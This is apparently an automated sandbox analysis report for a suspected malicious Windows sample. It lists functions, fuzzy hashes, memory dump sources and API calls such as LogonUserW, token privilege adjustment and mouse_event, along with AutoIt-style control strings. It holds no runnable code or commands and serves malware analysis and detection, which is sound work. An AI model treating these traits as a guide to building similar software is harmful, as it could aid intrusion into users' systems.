Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 982170e3e99e89f0b957f9e7bf2e1c5e5b077e6e7339dd3e1c64156aba8fb2ed
Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
Opcode Fuzzy Hash: 982170e3e99e89f0b957f9e7bf2e1c5e5b077e6e7339dd3e1c64156aba8fb2ed
Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18

Function 0042A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99

Function 0042F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
Instruction ID: 9dbe1c865c2330f56ffee62ed517aae1867acb93b770053fb6672ec4a27fddfc
Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
Instruction Fuzzy Hash: 08322861E29F114DD7239634D832336A258AFB73C8F95D737F819B5AA5EB28D4C34208

Function 0043242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
Instruction ID: 6c6381ca5121d9a8a5ca5470a2620081c1b3ce1be078dbaf297b8ac86cff2730
Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
Instruction Fuzzy Hash: E2B10130E2AF414DD72396398935336BA5CAFBB2C5F51D72BFC2670D22EB2185934185

Function 00B939A3 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B9399E,?,?,00000008,?,?,00B91CF4,00000000), ref: 00B93BD0

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: db97da991caa38f0fab7e2136a9a35903cf7fcb32f573992e9b7020bde608cdc
Instruction ID: 78320175f0449628838b422ea99d12c27b5c7e2acaff709201084535bacb4dd1
Opcode Fuzzy Hash: db97da991caa38f0fab7e2136a9a35903cf7fcb32f573992e9b7020bde608cdc
Instruction Fuzzy Hash: 22B14D312106089FDB15CF28C4CAB657BE0FF45765F2586A8E8DACF2A1C335DA92CB40

Function 00464C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
Instruction ID: b34e2a9394489d035c963e7dd8f40c9807a13273b0ab6c7f74163ad9f46ae88e
Opcode Fuzzy Hash: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
Instruction Fuzzy Hash: BED05EA032220838ECA807209D5FF7F1109E3C0B81F96854B7241853C1F8DC6801A03F

Function 004587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
Instruction ID: bbaf709efb0beb88cdfa5f1a33ae6004459e2c5163e494cc38a8a30eb56211a1
Opcode Fuzzy Hash: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
Instruction Fuzzy Hash: 49D05E3226050EAFEF018EA4DC01EAE3B69EB04B01F408521FE15D50A1C775E835AB60

Function 0042A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88

Function 00B8C7F0 Relevance: .9, Instructions: 853COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c782746eed260e06528d4c9607e080493cf09f296c0a1a6988a1952876e83e63
Instruction ID: 0667305259ef6221cdbdb48494c8eae6384ea6a7a2aac34d1e7ee67ca7d59cf4
Opcode Fuzzy Hash: c782746eed260e06528d4c9607e080493cf09f296c0a1a6988a1952876e83e63
Instruction Fuzzy Hash: 97822D76B083109FD748DF18D89075EF7E2ABC8314F1A893DA999E3354DA74EC118B86

Function 00B900D9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77a720ceb3894a1c58d3be121cb02512e0a5151a18674b6d69420dd530db5a09
Instruction ID: aa6d4d73dad0f52798d5c3cb39190725276af90112693af40d5a785660aaec3f
Opcode Fuzzy Hash: 77a720ceb3894a1c58d3be121cb02512e0a5151a18674b6d69420dd530db5a09
Instruction Fuzzy Hash: 5632D421E39F414DDB236638D862336A299AFB73D4F15D737E816B6DA5EF28C4835100

Function 00418808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
Instruction ID: d3e05baf70842595a15b67714876080b4d37379fdc1224c105ba09137936e944
Opcode Fuzzy Hash: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
Instruction Fuzzy Hash: 44223730904506CBDF288A68C4A47BEB7A1BF41345F28816FDD468B693DB7C9CD6C74A

Function 004221C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 35e5cfd0643d00128ec34ecd890c43f992cb4d917009b55117061340238bc551
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 18C1D83230507349DF2D4639953403FFAA15EA27B139A076FD8B3CB2D4EE18D965D624

Function 00B551EE Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
Instruction ID: 0dc8694feeaa221dad8ca001cacb5defa762a82728dd2f6dcf4cd204ea662272
Opcode Fuzzy Hash: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
Instruction Fuzzy Hash: 5DD17F72A187818FC318DE5CC89165AFBE2EBD5300F488A3DE5D6D7785D674E809CB82

Function 004225FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 4494295b5c4546222a84ad3f443fcd2c01bced2acdb834a923f1c328fe2fc13d
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: CAC1D4333090B34ADF2D4639953403FBAA15EA27B139B036FD4B2DB2D4EE18D925D624

Function 00B56EAF Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
Instruction ID: 480ccd50a65614688c5a585177538a6481bd18ce8d72143957c03d745c6151b0
Opcode Fuzzy Hash: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
Instruction Fuzzy Hash: BCA193B29093109FC344CF1AD88055BBBE2BFC8614F5AC96EF89897315D770E9458F8A

Function 00B85980 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
Instruction ID: ff6d5df8c18bcbe8fe2101f5cfd884a08bdb116bda97db56ce45bba43b3dbdc4
Opcode Fuzzy Hash: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
Instruction Fuzzy Hash: 5A6160736197818FC32CCE2CC89145ABBE2EEA521474C8F6DD4D687792D670FA09C792

Function 00B57F80 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dd8a885a926587e738a91183ccb4c459be548142e20a5cf2a95a904aba54aa6
Instruction ID: e025bed16a9db187d19549b6d7e0aef21e8108a0b470b56c70a9684c2ba52ff0
Opcode Fuzzy Hash: 4dd8a885a926587e738a91183ccb4c459be548142e20a5cf2a95a904aba54aa6
Instruction Fuzzy Hash: 43610235928BA44BC312AF39E84167AB3D4FFD6385F54C77EEA8173A90DF24110A8744

Function 00B9515C Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03fc354a8b6bb11c7c1489ef2a31dc6bd0ae6d2b5af5c3011d2ae4e86530258a
Instruction ID: b446432b5621173e9b1ca93a5ca895b85c72704aa26c9e2e25e9eb912e679961
Opcode Fuzzy Hash: 03fc354a8b6bb11c7c1489ef2a31dc6bd0ae6d2b5af5c3011d2ae4e86530258a
Instruction Fuzzy Hash: FC41265664DBC15EEB36823444823E2BFD2DF72309F0889ADD8C247A83D15AB54EC366

Function 0056C594 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
Instruction ID: 9ca45030816374493ad504bef7778a68cc74dc5459e378cd5d504e344b198e9f
Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
Instruction Fuzzy Hash: 4C314A32A063845BCF328A6DDC146B57F64BB77775F1D51A7E4C28B192C221AC40C669

Function 00B57B71 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b395afaa47f5cc7ecd3aedb19dcb8c673148562eb119a099dff518cea07a4fd
Instruction ID: 3daba6d88d0757330380d81215678abb834f0e3c60a8108e0b40453e2618ba9a
Opcode Fuzzy Hash: 4b395afaa47f5cc7ecd3aedb19dcb8c673148562eb119a099dff518cea07a4fd
Instruction Fuzzy Hash: B441C8306083554FC718EE69D8E077BB3D2FBC9316F5549BEDAC693280CA386419CB51

Function 00B83780 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
Instruction ID: 1f93681bd071c9b310666e60ae9e723361838b6add535ed4ccf0dafbb0d06587
Opcode Fuzzy Hash: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
Instruction Fuzzy Hash: 1E4170756183019F8348CF69C58091AFBE2BFCC318F25896EE8999B311D735E942CF92

Function 00B8D580 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
Instruction ID: b5869b5d75bce0de78fe886a00a9b2f8a43124a0caffc1323e520ea091567c1b
Opcode Fuzzy Hash: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
Instruction Fuzzy Hash: 4441AF456DE1C21EEB0B0B7190762E2EFF16CAF0487AEAAD9C0D80E203C503C587DB94

Function 00B51130 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Function 0048356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
IsWindowVisible.USER32(?), ref: 0048364B

Strings

GETCURRENTLINE, xrefs: 004838ED
CURRENTTAB, xrefs: 004836BD
GETLINE, xrefs: 0048399B
SETCURRENTSELECTION, xrefs: 004837B6
DELSTRING, xrefs: 00483749
FINDSTRING, xrefs: 00483776
ISVISIBLE, xrefs: 00483637
EDITPASTE, xrefs: 0048395F
ADDSTRING, xrefs: 00483716
GETCURRENTSELECTION, xrefs: 004837E3
GETCURRENTCOL, xrefs: 00483928
HIDEDROPDOWN, xrefs: 00483700
SENDCOMMANDID, xrefs: 004839DA
ISENABLED, xrefs: 0048366B
ISCHECKED, xrefs: 00483839
UNCHECK, xrefs: 00483883
CHECK, xrefs: 0048386D
SELECTSTRING, xrefs: 00483806
TABRIGHT, xrefs: 0048369D
GETSELECTED, xrefs: 004838A3
SHOWDROPDOWN, xrefs: 004836E0
GETLINECOUNT, xrefs: 004838C6
TABLEFT, xrefs: 00483687

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: fed52f404a64f80c9a9dc2c1c4167444291c9d1648bc4a49fe8c5b5d29b77391
Instruction ID: 9f5fdaa8788cae778637d634d7abea83d78ef325d3b9343814b8d9d38e530adb
Opcode Fuzzy Hash: fed52f404a64f80c9a9dc2c1c4167444291c9d1648bc4a49fe8c5b5d29b77391
Instruction Fuzzy Hash: 28D19E702042009BCA04FF11C451A6E77E5AF55759F54886EF8826B3A3DB3DEE0ACB5A

Function 0048A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0048A630
GetSysColorBrush.USER32(0000000F), ref: 0048A661
GetSysColor.USER32(0000000F), ref: 0048A66D
SetBkColor.GDI32(?,000000FF), ref: 0048A687
SelectObject.GDI32(?,00000000), ref: 0048A696
InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
GetSysColor.USER32(00000010), ref: 0048A6C9
CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
FrameRect.USER32(?,?,00000000), ref: 0048A6DF
DeleteObject.GDI32(00000000), ref: 0048A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
FillRect.USER32(?,?,00000000), ref: 0048A763
GetWindowLongW.USER32(?,000000F0), ref: 0048A78E

